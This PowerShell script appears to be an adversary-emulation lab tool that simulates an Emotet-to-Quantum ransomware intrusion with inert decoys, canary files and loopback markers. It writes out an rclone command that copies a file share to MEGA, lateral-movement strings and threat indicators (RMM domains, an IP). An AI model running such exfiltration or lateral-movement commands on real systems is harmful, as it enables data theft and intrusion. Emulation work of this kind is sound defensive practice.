#Requires -Version 5.1
#Requires -RunAsAdministrator
[CmdletBinding()]param([switch]$LabConfirmed)
. "$PSScriptRoot\EmotetQuantumSim-utilities.ps1";Assert-EmotetQuantumSafety -LabConfirmed:$LabConfirmed;$p=Initialize-EmotetQuantumEnvironment
foreach($n in @('17jun.exe','tacticalrmm.exe','meshagent.exe','AnyDesk.exe')){New-EmotetQuantumDecoy(Join-Path $p.Payloads $n)"Signed cmd.exe stand-in for $n"};$rmm=@{reportedServices=@('TacticalRMM Agent Service','Mesh Agent','AnyDesk Service');servicesCreated=0;softwareInstalled=0;API='api.floppasoftware.com';mesh='mesh.floppasoftware.com';anyDeskClientId='752733537';reportedLogin='84.17.49.114:1249'};Write-EmotetQuantumFile(Join-Path $p.Evidence 'rmm-service-negative-record.json')($rmm|ConvertTo-Json -Depth 5)'RMM safety record'
$rclone=Join-Path $p.Payloads 'rclone.exe';New-EmotetQuantumDecoy $rclone 'Rclone-to-MEGA stand-in' '53ae3567a34097f29011d752f1d3afab8f92beb36a8d6a5df5c1d4b12edc';foreach($n in @('Revenue.xlsx','Insurance.docx','Passwords.txt')){Write-EmotetQuantumFile(Join-Path $p.Staging $n)"GENERATED DATA CANARY $n. No organizational content."'collection canary'};Invoke-EmotetQuantumDecoy $rclone 'rclone.exe copy "\\LAB-FILE01\path" mega:1 -q --ignore-existing --auto-confirm --multi-thread-streams 6 --transfers 6' 'beacon.exe';Invoke-EmotetQuantumLoopback 443 'MEGA cloud exfiltration ~250MB reported' 'HTTPS marker';Write-EmotetQuantumFile(Join-Path $p.Evidence 'exfiltration-negative-record.json')(@{realShareDataRead=$false;MegaAccountUsed=$false;bytesTransferred=0;reportedBytesApprox=262144000;day5MailServerAttemptSucceeded=$false}|ConvertTo-Json)'exfil safety record'
foreach($n in @('netscan.exe','Powertool64.exe','dontsleep.exe','locker.dll','ProcessHacker.exe')){if($n-eq'locker.dll'){Write-EmotetQuantumFile(Join-Path $p.Payloads $n)'INERT QUANTUM DLL-NAME CANARY. Not a PE file.''ransomware canary'}else{New-EmotetQuantumDecoy(Join-Path $p.Payloads $n)"Signed cmd.exe stand-in for $n"}};Write-EmotetQuantumFile(Join-Path $p.Payloads '1.bat')'@REM INERT Quantum deployment batch canary. No target or credential commands.''deployment canary'
$operator=Join-Path $p.Payloads 'netscan.exe';Invoke-EmotetQuantumDecoy $operator 'meshagent.exe -> netscan.exe -> mstsc /v:LAB-WS01 and explorer \\LAB-WS01\C$' 'meshagent.exe';Invoke-EmotetQuantumLoopback 3389 'RDP to LAB-BACKUP01 and deployment server' 'RDP marker';Invoke-EmotetQuantumLoopback 445 'Quantum SMB propagation target list' 'SMB marker'
foreach($hostName in @('LAB-DC01','LAB-FILE01','LAB-BACKUP01','LAB-WS01')){foreach($n in @('Finance.xlsx','Operations.docx','Database.bak')){$o=Join-Path $p.Impact "$hostName\$n";Write-EmotetQuantumFile $o "GENERATED ORIGINAL $hostName/$n remains intact."'impact original';Write-EmotetQuantumFile "$o.Quantum.marker"'QUANTUM MARKER ONLY. Original not encrypted.''impact marker'};Write-EmotetQuantumFile(Join-Path $p.Impact "$hostName\README_TO_DECRYPT.html")'<html><body>INERT Quantum ransom-note canary. No payment link.</body></html>''note canary'}
Write-EmotetQuantumFile(Join-Path $p.Evidence 'impact-negative-record.json')(@{securityProcessesKilled=0;driversLoaded=0;shutdownOrLogoffChanged=$false;credentialsUsed=$false;targetListExecuted=$false;remoteHostsTouched=0;filesEncrypted=0;ransomwareDeploymentConfirmed=$false}|ConvertTo-Json)'impact safety record'
Add-EmotetQuantumTimeline 76 'persistence' 'Tactical RMM and Mesh Agent installation/service evidence represented' @{servicesCreated=0;softwareInstalled=0;technique='T1219'}
Add-EmotetQuantumTimeline 80 'exfiltration' 'Rclone-to-MEGA file-share exfiltration represented' @{realDataRead=$false;bytesTransferred=0;technique='T1567.002'}
Add-EmotetQuantumTimeline 96 'exfiltration' 'Day 5 failed mail-server Rclone attempt represented' @{bytesTransferred=0}
Add-EmotetQuantumTimeline 145 'persistence' 'Day 8 Tactical RMM session deploys AnyDesk' @{softwareInstalled=0}
Add-EmotetQuantumTimeline 149 'discovery' 'SoftPerfect Network Scanner and RDP/SMB host review represented' @{remoteHostsTouched=0}
Add-EmotetQuantumTimeline 153 'defense-evasion' 'PowerTool64 and Dont Sleep preparation represented' @{processesKilled=0;driversLoaded=0}
Add-EmotetQuantumTimeline 154 'impact' '1.bat invokes locker.dll target list and Quantum markers across generated hosts' @{filesEncrypted=0;remoteHostsTouched=0;technique='T1486'}
